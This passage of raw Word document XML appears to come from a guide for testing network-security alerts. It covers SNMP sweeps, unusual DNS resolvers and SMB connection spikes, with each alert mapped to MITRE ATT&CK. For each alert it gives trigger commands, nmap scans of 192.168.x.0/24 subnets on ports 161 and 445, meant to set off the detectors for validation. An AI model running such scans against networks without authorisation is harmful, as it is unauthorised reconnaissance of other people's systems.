      </w:r>
    </w:p>
    <w:p w14:paraId="7FBB2C23" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>History:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 9 days</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9934B3" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Telemetry:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> NetFlow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728785C6" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK Tactic: </w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Discovery (TA0007)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5423F976" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK Technique:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Network Service Discovery (T1046)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0325F984" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Special Considerations:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> This alert is enabled by default. The subnet used in the trigger command must be </w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>different</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> than the subnet for the host running the command. An example is provided here, but you will likely need to change the subnet when you run the trigger command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E1E1AB" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Preparation Command:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudo apt update; sudo apt -y install nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9B371E" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Trigger Command:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nmap 192.168.0.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739E23C8" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14CF9E1B" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>New SNMP Sweep</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF11B64" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Device attempted to reach a large number of hosts using SNMP. This can be an indication of malware or abuse.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB4C443" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Observation Type:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP Scanner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DA1EC7" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>History:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 9 days</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADB6314" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Telemetry:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> NetFlow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D74C53D" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK Tactic: </w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Discovery (TA0007)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BFA03C" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK Technique:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Network Service Discovery (T1046)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5972E700" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Special Considerations:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> This alert is enabled by default.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2814D699" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Preparation Command:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudo apt update; sudo apt -y install nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42797F21" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Trigger Command:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nmap -sT -p 161 -Pn 192.168.1.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0EDCC5" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37384BDB" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>New Unusual DNS Resolver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C2E5AE" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Device contacted a DNS resolver that it doesn't normally use. For example, an attacker could cause a DNS resolver to redirect a popular website to a domain that serves additional malware. This may indicate misconfiguration or the presence of malware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F204E0" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Observation Type:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Unusual DNS Resolver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB1D5D8" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>History:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 7 days</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6465C2D1" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Telemetry:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> NetFlow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEFB5CD" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK Tactic: </w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Command and Control (TA0011), Resource Development (TA0042)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1E4633" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK Technique:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Application Layer Protocol (T1071), Compromise Infrastructure (T1584)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D77EC5E" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Special Considerations:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> This alert is disabled by default. Toggle the “Enabled” switch to turn it on in Alert settings. This alert is looking for a new DNS server in use. There are multiple public DNS servers in the trigger command in case an organization is using multiple DNS servers. Be aware that once a host on the network contacts a new DNS server, it is no longer considered new.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB3A3D3" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Preparation Command:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> no preparation required to run this trigger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A088AD" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Trigger Command:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nslookup cisco.com 1.1.1.1; sleep 5; nslookup cisco.com 1.0.0.1; sleep 5; nslookup cisco.com 4.2.2.2; sleep 5; nslookup cisco.com 8.8.8.8; sleep 5; nslookup cisco.com 8.8.4.4; sleep 5; nslookup cisco.com 9.9.9.9; sleep 5; nslookup cisco.com 75.75.75.75; sleep 5; nslookup cisco.com 75.75.76.76; sleep 5; nslookup cisco.com 208.67.222.222; sleep 5; nslookup cisco.com 208.67.220.220</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A84970" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A161971" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SMB Connection Spike: Internal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDAD008" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Description:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Device attempted to contact an unusually large number of SMB servers. This can be an indication of malware or abuse.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616B7D6C" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Observation Type:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP Scanner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B7931D" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>History:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 9 days</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6493BB8A" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Telemetry:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> NetFlow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128E8EA7" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK Tactic: </w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Discovery (TA0007)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02035744" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK Technique:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Active Scanning (T1595), Network Denial of Service (T1498)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553780D4" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Special Considerations:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> This alert is enabled by default.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D56168A" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Preparation Command:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudo apt update; sudo apt -y install nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAB8E96" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Trigger Command:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nmap -sT -p 445 -v -Pn 192.168.1.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228A0442" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23D223E2" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SMB Connection Spike: Outbound</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB748A7" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
